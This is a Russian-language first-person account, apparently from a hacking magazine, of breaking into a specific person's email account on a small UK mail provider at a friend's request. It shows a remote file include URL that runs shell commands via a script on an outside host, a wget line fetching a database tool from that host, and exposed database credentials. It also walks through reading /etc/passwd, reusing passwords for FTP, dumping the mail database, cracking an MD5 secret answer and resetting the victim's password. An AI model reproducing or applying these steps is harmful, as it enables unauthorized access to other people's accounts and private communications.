Так повелось, что я никогда не брался за взлом мыл. Но тут поступило
заманчивое предложение от одного знакомого, которому
позарез нужен был доступ к одному мылу. Само мыло располагалось на небольшом
почтовике *.co.uk. Знакомый пробовал брутить мыло, но результата это не принесло
и он обратился ко мне. Сперва я просмотрел сам почтовик. Кроме окошка ввода
логина/пароля все сплошной html. Попробовал форму ввода пароля на Sql-инъекцию,
но кавычки фильтровались. Server: Apache/1.3.34 (Unix) PHP/5.0.5
mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635
mod_ssl/2.8.25 OpenSSL/0.9.7a. Окрытые порты с сервисами тоже не радовали.

Решил проверить, не хостится ли тут еще кто-то. Оказалось по данному ip числится
еще несколько десятков сайтов. Прошелся по ним, единственный phpBB оказался
патченным, поэтому ни один из эксплойтов не сработал. И тут я наткнулся на
продукт ArticleBeach.

Первый же запрос:

http://www.***.com/index.php?page= http://durito.narod.ru/sh&cmd=ls%20-lpa

выдал мне список файлов сервера. Зря программисты ArticleBeach ели свой хлеб с
маслом. Полазив по сайту я нашел еще одни баг, добродушно оставленный
разработчиками ArticleBeach, в директории /includes/ любой юзер может
просмотреть файл config.inc следующего содержания:

Пример файла взят с сайта девелоперов ArticleBeach

http://www.articlebeach.com/includes/config.inc
:

<?
global $_cn;
global $dbserver;
global $db;
global $dbuser;
global $dbpass;

//mysql database server,login,password & Database name
$dbserver ="localhost";
$database_connect="article_art";
$dbuser ="article_jer";
$dbpass ="aaaaa";

$connect = mysql_connect($dbserver, $dbuser, $dbpass)
or die("Couldn’t connect to MySQL");
mysql_select_db($database_connect, $connect);
?>

Как вы уже поняли это реквизиты доступа к базе данных сервера. К сожалению в
моем случае пароль на базу данных не подошел к фтп, чего не скажешь о других
сайтах, где стоит продукт от ArticleBeach. Пришлось ковырять сервер через
внешнюю инклуду. Открыв /etc/passwd я не смог обнаружить имя нужного мне
почтовика, логины юзеров и доменные имена сайтов не совпадали. Зато была
возможность просматривать web-директории пользователей: /home/*/public_html/.
Уже хотел было начать тупо перебирать всех по списку, но решил проверить файл
accounting.log, в котором хранятся логины и доменные имена на cpanel. И точно, я
получил список доменных имен. Выбрал нужный и стал изучать веб-директорию.
Быстро нашел в исходниках реквизиты доступа к БД MySQL:

‘database’ => ‘***_themail’, // Name of your MySQL database
‘username’ => ‘***_postman’, // The username and password that
‘password’ => ‘jkretj3h45j’

Пароль опять не подошел к фтп.

Осталось только прицепится к БД. Надо было искать доступную на запись директорию
или файл. И опять спасибо разработчикам ArticleBeach, которые позаботились в
своем продукте о директории /backup/ с правами drwxrwxrwx.

http://www.***.com/index.php?page=http://durito.narod.ru/sh&cmd=wget -O backup/sql.php
http://durito.narod.ru/sql.php

и фиг, то же самое с GET, links, fetch, lynx. Позже я узнал, что запуск wget и
GET запрещался PHP Secure, links, fetch и lynx отсутствовали. Продолжил
внутренний осмотр сайтов хостера. Навыуживал еще несколько паролей к БД, но к
фтп они опять не подошли, все пароли представляли собой многосимвольную
абракадабру. И вдруг тайваньский сайт! Интуиция подсказала проверить его и вот
он — пароль доступа к БД — anahol!!! Конект к фтп, пасс проходит и скрипт для
работы с БД от rst.void.ru залит.

Конект к базе, нахожу нужную таблицу и дамплю ее. А вот и заветное мыло,
пароль правда зашифрован MD5, но это дело поправимое, правда долгое и муторное.
Но для начала я решил проверить хеш на http://md5.rednoize.com/, но пасс не был
найден, и я уже приготовился было к долгому перебору, но тут заметил, что и
ответ на секретный вопрос тоже закодирован в MD5. Пробиваю на md5.rednoize.com
секретный вопрос и вот он: Cheung!!!

Захожу на почтовик и отвечаю на секретный вопрос. Мне предлагают ввести новый
пароль и его подтвердить. Шах и мат! И мой приятель получает доступ к заветному
мылу, не забыв мне выкатить пива. А я удаляюсь его жадно поглощать.

Описания уязвимостей

Оставить мнение

Check Also

Windows 10 против шифровальщиков. Как устроена защита в обновленной Windows 10

Этой осенью Windows 10 обновилась до версии 1709 с кодовым названием Fall Creators Update …